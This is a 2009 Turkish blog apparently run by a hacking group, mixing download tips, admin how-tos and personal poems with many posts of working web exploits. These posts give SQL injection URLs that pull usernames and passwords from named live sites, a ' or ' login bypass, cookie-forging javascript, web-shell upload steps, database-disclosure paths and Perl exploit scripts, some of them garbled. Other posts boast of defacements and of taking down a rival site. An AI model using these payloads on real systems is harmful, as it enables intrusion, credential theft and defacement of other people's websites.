28 Haziran 2009 Pazar
Güzel Bir Mp3 İndirme Programı
Yeni tanıştığım tamamen türk yapımı olan bu program mp3 indirmede diğer programlara göre oldukça başarılı.Sınırsız ve hızlı kullanım özelliği ile bilgisayarımda olmazsa olmaz programlar arasında çoktan yerini aldı :) Ayrıca en güzel özelliklerinden birisi portable olması yani flash diskinizde taşıyabilir istediğiniz bilgisayarda kullanabilirsiniz sadece 289 kb! Burdanindirebilirsiniz.
Programı bilgisayarınızda çalıştırabilmek için NetFramework 2.0'ın bilgisayarınızda kurulu olması gerekiyor onuda burdan indirebilirsiniz
Rapidshareyi sömürmek
Şimdi Rapidsharede Program vs. Bulacağız.Biraz Kendisi Uraşarak Private İçerikli Paylaşımları Bulabilirsiniz. Web Browserınızın Seach Kısmını Kullanıp Arama Yapabilirsiniz.
Burdan Başlayın.
Index Of /rapidshare.com/
Rapidshare Search Engine - Rapidshare1.com
20 Haziran 2009 Cumartesi
SunByte e-Flower (id) Remote SQL Injection Güvenlik Açığı
http://www.sunbyte.net/
Sunbyte E-Çiçek [ E-Ticaret WebApp ]
http://www.sunbyte.net/products/index.php?screen=eflower
SQL ENJEKSİYON
Sunbyte E-Çiçek [ E-Ticaret WebApp ]
http://www.sunbyte.net/products/index.php?screen=eflower
SQL ENJEKSİYON
# Örnek :
Http://localhost/sunbyte/popupproduct.php?id = [UR Burada]
Http://localhost/sunbyte/popupproduct.php?id = [UR Burada]
# Canlı Örnek :
Http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
Codefixer MailingListPro (MailingList.mdb) Veritabanı Açığa Çıkması Güvenlik Açığı
MailingListPro
Sürüm : FreeEdition
http://www.codefixersoftware.com/downloads/mailinglist.zip
# Exploit : http://hedef.com/db/MailingList.mdb
# Canlı Örnek : http://www.codefixer.com/mailingList/db/MailingList.mdb
19 Haziran 2009 Cuma
Wordpress Sitemap Generator - Eklentisi
Size Bu Yazımda Değişik Bir Sitemap Eklentisi Sunacağım.
Bu Eklenti Diğer Sitemap Eklentileri Gibi XML Haritası Oluşturmuyor ;
WordPress'de Onun İçin Sayfa Açıyorsunuz O Kadar.
Biliyorsunuz ki Sitemap SEO İçin Önemlidir. Sitenizdeki Konuları Google’ın Daha Rahat İndex'lemesine Yardımcı Olur.
http://downloads.wordpress.org/plugi...-generator.zip
Kurulum ;
-İndirdiğiniz Zip dosyasını klasöre çıkartalım.
-Çıkan klasörü wp-content/plugins dizinine fırlatalım.
-Admin menüsünden Eklentiler bölümüne girerek, Eklentimizi aktif edelim.
-Ayarlardan "DDSitemapgen" eklentisinin dilini TÜRKÇE yapalım.
-Sitemap için yeni bir sayfa oluşturalım ve içine ""
(Tırnak işaretleri eklenmeyecek) yazalım..
Ve Sonunda Google Hizmetinizde ... Selametle ...
Mysql Root Şifresi Sıfırlamak
Sırası İle Komutları Takip Ederek Root Şifrenizi Sıfırlayabilirsiniz.
/etc/init.d/mysql stop
mysqld_safe –skip-grant-tables &
mysql -u root
use mysql;
update user set password=PASSWORD(”yenişifreniz”) where User=’root’;
flush privileges;
quit
/etc/init.d/mysql stop
/etc/init.d/mysql start
Yaptıktan Sonra ;
Mysql -u Root -p
Komutu İle Giriş Yapabilirsiniz. Şifre Soracaktır Yeni Şifreniz Olarak Belirttiğim Kısıma Şfrenizi Yazınız.
/etc/init.d/mysql Olarak Yazdığım Kısım /etc/init.d/mysql Olarakta Olabilir.
16 Haziran 2009 Salı
Sansür Perdesi
GözleRim sansür perdesi
Bensiz ruhuma kaç para biçtin?
Hadi git durma..
Görmezden geldim.
Beni benim önümde yerle bir ettin!
Ben insanmışım...
Hakkımı HAK'tan sipariş almışlar,
Düşünce yetime kelepçe takmaya musallat olmuşlar.
Yatıya kalmamış,dudakta okunan iyimser dualar.
Beynime kumanda takmış oynamaktalar,ama çakılmadım.
Kime ne ki ben kimim?..
Nereye yürüyorum?...
Gönlümün bahçesine günde kaç çiçek dikiyorum ?...
Aynamın cadısına günde kaç kez selam veriyorum?...
Evimin hangi odasında ölmek istiyorum?...
Bende bilmiyorum...
Ne tuhaftır ki,biriniz her zaman şanslı sıfatı aldınız.
Çoğunuz buraya test için atıldınız.
Yıprandıkça arttı aşkınız,yandınız.
Yarına salim çıkmak yetmez,yanıldınız.
Yankılanan milyar ahın hücumda ağır sövgüsü.
Tünel sonunda görülür ıstırahat köprüsü.
Ne zaman onla tanışacak bu ömrün paslı törpüsü.
Ve onca tünel faresinin gürültüsü...
15 Haziran 2009 Pazartesi
Şüphesi Olan Okusun
Adamın biri her zaman olduğu gibi saç ve sakal traşı olmak için berbere gitti.
Onunla ilgilenen berberle güzel bir sohbete başladılar.
Değişik konuşar üzerinde konuştular.
Birden ALLAH ile ilgili konu açıldı...
Berber:"Bak adamım.ben senin söylediğin gibi ALLAH'ın varlığına inanmıyorum."
Adam:"Peki neden böyle diyorsun?"
Berber:"Bunu açıklamak çok kolay.Lütfen bana söyler misin ,eğer ALLAH varolsaydı,
bu kadar çok sorunlu,sıkıntılı,hasta insan olur muydu,
terkedilmiş çocuklar olur muydu?ALLAH olsaydı,
kimse acı çektirmez,birbirini üzmezdi.
ALLAH olsaydı bunlara izin vereceğini sanmıyorum."
Adam bir an durdu ve düşündü.Ama gereksiz bir tartışmaya girmek istemediği için cevap vermedi.Berber işini bitirdikten sonra adam dışarıya çıktı.
Tam o anda caddede uzun saçlı ve sakallı bir adam gördü.Adam bu kadar dağınık göründüğüne göre belli ki
traş olmayalı uzun süre geçmişti.Adam berberin dükkanına geri döndü.
Adam:"Biliyor musun ne var,bence berber diye bir şey yok."
Berber:"Bu nasıl olabilir ki?Ben burdayım ve bir berberim."
Adam:"Hayır yok,çünkü olsaydı caddede yürüyen uzun saçlı ve sakallı adamlar olmazdı."
Berber:"Hmmm,berber diye bir şey var ama o insanlar bana gelmiyorsa ben ne yapabilirim ki?"
Adam:"Kesinlikle doğru!Püf noktası bu!ALLAH var ve insanlar ona gitmiyorsa,
bu gitmeyenlerin tercihi.İşte dünyada bu kadar çok acı ve kederin olmasının nedeni."
Varlığının Canı Cehenneme ...
Ad1n1 Sildim (Düzenleme : Kerim [Mic Rap]) - Hiphoplife.NeT - Rahdan
Bu gece yokluğunun dökümünü yapıyorum. Aylar önce sensizliğe yazdığım şiiri okudum, bir de dün gece yazdığımı… Hiç fark yok… Neden azalmıyorsun bende! Neden gidişin dün gibi? Neden sana yazdığım her yazı, hep aynı yerde tıkanıyor? Ben kimseyi yokluğunda bu kadar önemsemedim… Kimseyi yokluğunda bu kadar özlemedim… Ve şuna emin ol; hiç kimse, yok’ken bu kadar sevilmedi… ben karşıma “aşk” diye bu sonucu çıkaran,yarım kalmışlıktan başka bir şey değil,bunun farkındayım..
Ama iyi ama kötü, bitmeli her hikâye! Sen bitmedin… Bitmeyensin… Ayrılığın adını koyamadık sevgilim. İşte bu yüzden kopamadık birbirimizden bir türlü… Ben yarım kalan ve adı konmayan hiçbir şeyi unutmam… Unutmamam… İçimde sızısı kalır. Ya her şey yaşanacağı yere kadar yaşanıp sona ermeli ya da ayrılık söz konusu olduğunda bir daha kimsenin çıtı çıkmamalı! Biz bunu başaramadık, ayrılamadık! Sen yaşanıp da bitseydin eğer hatırıma gelmezsin. Seni bu kadar yazılası yapan, yarım kalmışlığındır…
O gecenin sabahında, ayrılığın aklına nerden geldiğini biliyorum… Anlamıştın benim soyut’a tutkun olduğumu… O yüzden gittin kim bilir… Sevilmek için, güzel hatırlanmak için, kayıplara karışmayı tercih ettin… Haklıydın belki de… Olağan hiçbir şeyi sevemedim ben hayatım boyunca… Herkesin, her an yaşadığı hiçbir şeyi benimsemedim… Ben yaşadığım hiçbir aşkı hayatın akışına bırakmadım. Bunu yapanlar her zaman kaybeder… Zaman denilen kavram düşmanıdır aşkın… Eğer ortada aşk denen bir şey varsa, ne yapıp edip zamanı durdurmalı. Biz bunu başaramadık… Oysa bu o kadar zor bir şey değildi sevgili… Farklı dokunuş, ağızdan çıkan ve bugüne kadar kullanılmamış bir söz yeterdi zamanı durdurmaya… Ben aşktan söz açıldığında zamanı durduramayan kimseyi sevemedim… Ondandır belki de varlığında sevemediğim insanları, yokluğunda düşlemek… Belki de ondandır, yanındayken yüreğinin gurbetine düştüğüm bir sevgiliyi, sılasında özlemek…
Yokluğunda hiç de adil değil… Beni yok ediyor, seni var ediyor sevdiğim… Evet, seviyorum seni varlığına rağmen! Üç mevsim değişti bu şehirde ama ben varlığınla yokluğunun tezadını çözemedim… Seni yaşamak istemiyorum! Öyle bir sen yarattım ki sen yokken, yaşanıldığı an yitirir anlamını… Sen yokken yarattığım sen, yasakladı sana dokunmamı… Sana düşman bir sen var içimde… Seni senle savaştırıyorum, olan bana oluyor…
Tam olarak hatırlamıyorum ama uzun zaman önce bir yerden duymuştum bu sözü “hani ruhlarımız öpüşür ya? Başkasındayken ağzımız…”şu an varlığınla yokluğunun tezadını bu şekilde tanımlıyorum, seni senle savaştırırken mağlup olan yüreğime… Birkaç ay geçtikten sonra, daha anlaşılır bir tanım bulabilirim elbet ama şimdi gerçek olan bu; ruhlarımız öpüşüyor sevgilim…
Gidişin beni yaralamadı, aksine daha bir sevilir hale geldin… Varlığındaki seni, yokluğundaki sen kadar sevmezdim…”keşke sen yanımda olsaydın, keşke bir şeyler yapıp da seninle zamanı durdursaydık ”diye hayıflanıyorum artık… Her ne kadar adı konmasa da bu kopuşun, her ne kadar vazgeçmeyi beceremesek de, ayrılık ihtiyaçtandı bu hikâyede… Yazık! Son sözü zaman söyleyecek… Yazık! Bu sefer hayatın acımasız akışına bıraktık aşkı… Ben senden kalan ayrılığa bile yas tutamıyorum adam gibi! Bunu engelleyen senin varlığın… Ben bunca zaman yokluğundaki senle hayatı paylaşsaydım ve böyle bir senle ayrılığı yaşasaydım, hiçbir şiir kolay kolay hayata döndüremezdi beni… İşte bu kadar güzeldir senin yokluğun… İşte bu kadar ayrılığına üzülmemi engelliyor varlığın…
VARLIĞININ CANI CEHENNEME, YOKLUĞUNU ALMA BARİ…
Ama iyi ama kötü, bitmeli her hikâye! Sen bitmedin… Bitmeyensin… Ayrılığın adını koyamadık sevgilim. İşte bu yüzden kopamadık birbirimizden bir türlü… Ben yarım kalan ve adı konmayan hiçbir şeyi unutmam… Unutmamam… İçimde sızısı kalır. Ya her şey yaşanacağı yere kadar yaşanıp sona ermeli ya da ayrılık söz konusu olduğunda bir daha kimsenin çıtı çıkmamalı! Biz bunu başaramadık, ayrılamadık! Sen yaşanıp da bitseydin eğer hatırıma gelmezsin. Seni bu kadar yazılası yapan, yarım kalmışlığındır…
O gecenin sabahında, ayrılığın aklına nerden geldiğini biliyorum… Anlamıştın benim soyut’a tutkun olduğumu… O yüzden gittin kim bilir… Sevilmek için, güzel hatırlanmak için, kayıplara karışmayı tercih ettin… Haklıydın belki de… Olağan hiçbir şeyi sevemedim ben hayatım boyunca… Herkesin, her an yaşadığı hiçbir şeyi benimsemedim… Ben yaşadığım hiçbir aşkı hayatın akışına bırakmadım. Bunu yapanlar her zaman kaybeder… Zaman denilen kavram düşmanıdır aşkın… Eğer ortada aşk denen bir şey varsa, ne yapıp edip zamanı durdurmalı. Biz bunu başaramadık… Oysa bu o kadar zor bir şey değildi sevgili… Farklı dokunuş, ağızdan çıkan ve bugüne kadar kullanılmamış bir söz yeterdi zamanı durdurmaya… Ben aşktan söz açıldığında zamanı durduramayan kimseyi sevemedim… Ondandır belki de varlığında sevemediğim insanları, yokluğunda düşlemek… Belki de ondandır, yanındayken yüreğinin gurbetine düştüğüm bir sevgiliyi, sılasında özlemek…
Yokluğunda hiç de adil değil… Beni yok ediyor, seni var ediyor sevdiğim… Evet, seviyorum seni varlığına rağmen! Üç mevsim değişti bu şehirde ama ben varlığınla yokluğunun tezadını çözemedim… Seni yaşamak istemiyorum! Öyle bir sen yarattım ki sen yokken, yaşanıldığı an yitirir anlamını… Sen yokken yarattığım sen, yasakladı sana dokunmamı… Sana düşman bir sen var içimde… Seni senle savaştırıyorum, olan bana oluyor…
Tam olarak hatırlamıyorum ama uzun zaman önce bir yerden duymuştum bu sözü “hani ruhlarımız öpüşür ya? Başkasındayken ağzımız…”şu an varlığınla yokluğunun tezadını bu şekilde tanımlıyorum, seni senle savaştırırken mağlup olan yüreğime… Birkaç ay geçtikten sonra, daha anlaşılır bir tanım bulabilirim elbet ama şimdi gerçek olan bu; ruhlarımız öpüşüyor sevgilim…
Gidişin beni yaralamadı, aksine daha bir sevilir hale geldin… Varlığındaki seni, yokluğundaki sen kadar sevmezdim…”keşke sen yanımda olsaydın, keşke bir şeyler yapıp da seninle zamanı durdursaydık ”diye hayıflanıyorum artık… Her ne kadar adı konmasa da bu kopuşun, her ne kadar vazgeçmeyi beceremesek de, ayrılık ihtiyaçtandı bu hikâyede… Yazık! Son sözü zaman söyleyecek… Yazık! Bu sefer hayatın acımasız akışına bıraktık aşkı… Ben senden kalan ayrılığa bile yas tutamıyorum adam gibi! Bunu engelleyen senin varlığın… Ben bunca zaman yokluğundaki senle hayatı paylaşsaydım ve böyle bir senle ayrılığı yaşasaydım, hiçbir şiir kolay kolay hayata döndüremezdi beni… İşte bu kadar güzeldir senin yokluğun… İşte bu kadar ayrılığına üzülmemi engelliyor varlığın…
VARLIĞININ CANI CEHENNEME, YOKLUĞUNU ALMA BARİ…
Derin Boşluklar
Kaybetmişim kendimi o derin uçsuz bucaksız boşluklarda hayatın anlamını ararken. Bir ışık vuruyor senin tarafından. Tüm benliğimle koşuyorum ama yaklaşamıyorum bir adım bile . Belkide uzaklaşan o. Tüm çabalarıma rağmen olmuyor. Neden uzaklaşıyor anlamıyorum. Hayatın anlamını belki de o tarafa gidebilsem çözücem. Yine boşlukta hissediyorum kendimi.
Yanlızlık yüzüme işliyor, gözlerim herşeyi belli ediyor.
Yüzüme bakan hastamısın diye soruyor. Hayır diyorum. Nasıl anlatabilirim ki Sensizliğin Acısını ? Onlar ne bilir ki Sensizliğin Acısını. Sen ne bilirsin ki Sensizliğin Acısını ...
Yalnızlığın Ritmi
Çoğu İnsanı Çok İyi İfade Eden Bir Şarkı Dinlemenizi Tavsiye Ederim.Dinledikden Sonra Yorumlarınızı Beklerim. İyi Seyirler.Download Şarkı.
- For more amazing video clips, click here
14 Haziran 2009 Pazar
iMhaTimi.Org Dünya Genelinde 37.ci Sırada
iMhatimi olarak Zone-h.org dünya genelinde kısa bir sürede 37. sıraya yükseldik (SpyHackerZ.Com Bize aittir) Saldırılarımız eskiye nazaran yoğunluğunu yavaşlatmıştır. Buna sebep olarak bundan sonra İMT olarak hacking'den çok Programlama Tasarım Güvenlik kulvarlarında ilerleyeceğiz, ancak hacking daha öncede belirttiğim gibi tamamen durdurulmadı ve gereken yerlere gerektiği zamanda cevabımız herzaman çok ağır olacaktır.
Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln
Link: http://www.milw0rm.com/exploits/7390
Discovered : Public Version
Exploit For Demo :
http://www.dotnetindex.com/demos/prodownloadmanager/admin/
user: ZoRLu
passwd: ' or '
Alıntıdır.
EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject
EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject
Link: http://www.exploiter5.com/all.php?id=39
Link: http://packetstormsecurity.org/0812-exploits/evimgibi-sql.txt
Author: Public Version
Dork: intext:"Asp Programlama : EvimGibi"
Exploit ;
http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]
[SQL]=
-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
Example ;
http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Link 1 : http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt
Link 2 : http://www.exploiter5.com/all.php?id=46
Discovered : Public Version
Exploit For Demo :
You Go This Link :
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin
Right Click To on Photo and You Must See
http://preproject.com/pgallery/pimages/4
Column Number 4
And You Go This Links
username:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
password:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
So For Demo :
username: admin
password: admin
Exploit For Demo : (DD)
http://preproject.com/pgallery/database/photo.mdb
E-SMART CART Remote File Upload
Link 1 : http://packetstormsecurity.org/0812-exploits/esmartcart-upload.txtE-SMART CART Remote File Upload
Link 2 : http://www.exploiter5.com/all.php?id=48
Discovered : Public Version
Exploit :
http://localhost/script/embadmin/base_ads/[id]_shell.asp
Exploit For Demo:
http://preproject.com/GScart/embadmin/main_baseimage.asp?action=add
You Go To Here And Click To Gozat Button, Select your_shell.asp and Write Link
After Go Shell
http://preproject.com/GScart/embadmin/base_ads/zehir4.asp
Abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
Abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered : Public verison
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
İntellitamper v2.07 (.txt file ) Local Buffer Overflow POC
Kaynak: http://packetstormsecurity.org/0904-exploits/intellitamper207-overflow.txt
# Author: Public version
# Home: iMhaTimi.Org
# Msn: by.saruhan@imhatimi.org
# Not: herkes hecker olmus :S
# intellitamper v2.07 (.txt file ) Local buffer overflow POC
# EAX 7EFEFEFE
# ECX 3F82EA97
# EDX 41414141
# EBX FE0C702F
# ESP 001235C8
# ESI 01F455A4
# EDI 00130000 ASCII "Actx "
# EIP 00416369 intellit.00416369
# EDX 41414141 for char 50644
# --------------------------------------------------------
#!/usr/bin/perl
#[*] intellitamper v2.07 (.txt file ) Local buffer overflow POC
use warnings;
use strict;
my $chars = "\x41" x 50644 ;
my $file="z0rlu.txt";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file Dosya Hazir. \n";
# ----------------------------------------------------------
Online Password Manager 4.1 Insecure Cookie Handling Vulnerability
Kaynak : http://www.milw0rm.com/exploits/8450
Exploit :
javascript:document.cookie = "auth=[nick]; path=/";
Exploit For Demo :
http://www.esoftpro.com/demo/OPM/main.php
javascript:document.cookie = "auth=admin; path=/";
Winn ASP GuestBook 1.01b Remote Database Disclosure Exploit
Kaynak: http://www.milw0rm.com/exploits/8596 #!/usr/bin/perl -w
#
# Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit
#
# Found By : Public Version
#
# Home: milw0rm.com
#
# Not: Bug Bulunamaz diye bir şey yok arkadaşlar yapan yapıyor siz neden yapmayasınız ki ?
#
# Thanks : AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N And All Friends
#
# Download : http://winn.ws/downloads/asp-guestbook-v1-01.zip
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit');
system('color 2');
if(@ARGV < file="data/guestbook.mdb" url = "http://" useragent =" LWP::UserAgent-">new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
İnterlogy Profile Manager Basic Insecure Cookie Handling Vulnerability
Kaynak: http://www.milw0rm.com/exploits/8895
Desc :
Normal Login For Cookie
Pmadm=dGVzdA;
if ý do this :
Pmadm=dGVzd(write any thing);
Example :
pmadm=dGVzdz;
or
pmadm=dGVzd123231212313;
Not Login
if ý do wthis:
Pmadm=dGVzd ' or ';
Boom this Loggin
Exploit :
javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";
After You Go Here :
http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp
or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users
Geçmişten Bu Yana Kullandığımız Sloganlar
Geçmişten bu yana kullandığımız aklımda kalan tüm sloganları yazıyım dedim Arşiv niyetine ...
Sevgimizin bittiği yerde nefretimiz başlar !!!
Çakarız dedikmi çakarız !
Racon kesmiyoruz sadece raconu uyguluyoruz !
Herkez durur ! İmha vurur !!
Varlık içinde yokluk çeksende.. Herkezin bir ölüm günü vardır !
Kral ve kural tanımam !
Karalistem okunaklı Sonuçları dokunaklı..
iMhatimi Düzenli ordu D.O
Hack Of Turkey İllegal Attack
Sizlerde bildiklerinizi yorumlarınızda yazın arkadaşlar ...
MSSQL Post Attack
Program verilen bir Web Sayfasının veri gönderme esnasında gelen giden tüm parametreleri göstererek hangi parametreye hangi değeri girdin göstererek o verinin Post Action kısmına Sql İnjection yaparak sistemdeki Database , Tablo , Colum , Datalar'ı çeker ...
En Büyük Özelliği : Listeden Hangi Databaseyi Seçersen o Database'nin Tablolarını Listeler.
Kullanım ;
İlk önce Post Datayı yakalaya tıklayın . Gelen Pencereden Post yolluyacağınız URL'yi girin daha sonra Browser üzerinden rastgele değerler girin . Butona tıkladığınızda programın penceresine otomatik olarak geldiğinizi göreceksiniz . Action URL'yi gireceksiniz daha sonra hangi Parametre'den Sql yapacağınızı seçtikten sonra Tara'ya tıklayın . Gerisini ona bırakın...
İlk önce Post Datayı yakalaya tıklayın . Gelen Pencereden Post yolluyacağınız URL'yi girin daha sonra Browser üzerinden rastgele değerler girin . Butona tıkladığınızda programın penceresine otomatik olarak geldiğinizi göreceksiniz . Action URL'yi gireceksiniz daha sonra hangi Parametre'den Sql yapacağınızı seçtikten sonra Tara'ya tıklayın . Gerisini ona bırakın...
Selametle ...
GROUP_CONCAT MySQL SQL Injection
Yeni bir MySql İnjection tekniği ;
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 2,1
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 3,1
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT n,1
Selametle ...
Union ile pratik bilgiler // Access Jet Injection
Merhaba arkadaşlar, Microsoft Jet Database ve Access database kullanan sistemleri bildiğiniz üzere tablo ve column adlarını deneme yanılma yaparak union sorgusu ile bulmaya çalışırız. Bu konuda size yardımcı olacak bir kaç ufak izlenimlerimi aktarmak istiyorum..
Önceliklse sayfanın adına bakın haberler.asp gibiyse tablo adı haberlerdir, /editor dizini varsa ve editor login sayfası geliyorsa editörlerin kayıtlı olduğu tablo editordür.. Sonra bu sayfanın kaynak kodundan textboxların name değerlerine bakın column adlarıda genellikle odur. Şuana kadar union ile çekmeye çalıştığım jet ve access dblerin tablo adlarını böyle buldum.. Selametle ..
Bir varmış bir yokmuş
Çok Uzun Bir Hikaye..
Yazı silinmiştir.Bende bilmiyorum
Ölmek isterken aslında
Yaşamın kıyısından tutunmak
Garip bir duygu
Tamamladığını düşünmek vazifeni
Artık ayrılmak
Yeter demek her şeye
Yeter
Bırakın beni bari adam gibi öleyim
Ama olmuyor işte
Geride bırakılan hep bir soru hep birileri var mutlaka
Ya öyle değil böyleyse diye başlayan sorular
Onun için değermi diye avunmalar
Değer belki başarabilsek adam gibi ölmeyi
Ya geride kalanlar
Onlar
Onları üzmek
Bu da çok ağır biliyormusun
Tabi varsa geride kalan
“Umudun bittiği yerde” olmak ne demek
Hiç düşündünmü
Ben çok düşündüm
Herkese akıl verirken kolay
Hadi şimdi seni görelim bakalım
“Köşeyi dönsen ölüm,düz gitsen hayat”
Eee hadi
Kolay değil demi
Burası umudun bittiği yer
Ne olcak şimdi
Bende bilmiyorum
13 Haziran 2009 Cumartesi
İMT Template
SaintS* Kardeşimin uğraşı sonucu güzel bir template hazırladı. Biraz WordPress'e benzedi ama html olarak kodlanmış.
Exalted'e fotoshop'larından dolayı TRouBLeSHooTeR sitesine upload ettiği için Teşekkürler ...
Templateyi Görmek için tıklayınız.
Rar şifresi : www.imhatimi.org
Shellcenter.org Down !
http://www.shellcenter.org Ftpden görüntüler: http://i43.tinypic.com/2igjd5s.jpg Chironex ile MecTruy üstadların yaptığı bir opersaysonun sonucu köpek eniğinin sitesi index'lendi ve ilerki günlerde daha çok gelişmeler göreceksiniz sadece bizi takip edin.Basıcaz Diyipte Basmadığımız Bi Yer varmı Amk ?
http://www.abrekzone.com/deface_mirror/?id=7532
http://tc-mirror.com/wiev_mirr0r/?id=19707
12 Haziran 2009 Cuma
Kişisel Domain
S.a. Arkadaşlar Bir Süredir İMHATİMİ.ORG'dan uzak durma sebeplerim vardı ve bunu İMT'nin üst düzey yetkililerinin haberleri vardı.Ve Crack adlı kişiyle bir süre takılmışlığım var onlara ait olan bir vps'den domain almıştım [Betulum.org] Şu andan itibaren çoluk çocukla ilişkimi kesiyorum eğerki domaine herhangi bir index gelmesi onlar tarafından bu onların lamerliğini ispatlar.Domain Spy[kaldera]'nın korfeztescil adlı hostunda yer almakdadır.Şifrelerin verilmesi Spy tarafından veya crack'in kendiside her ftp şifremi bilmekdedir.Konuşma kayıtlarıda vardır.Basılmasını bekliyoruz ve görmek istiyoruz bu lamerliği ... Saygılarımla arkadaşlar.
Kaydol:
Kayıtlar (Atom)
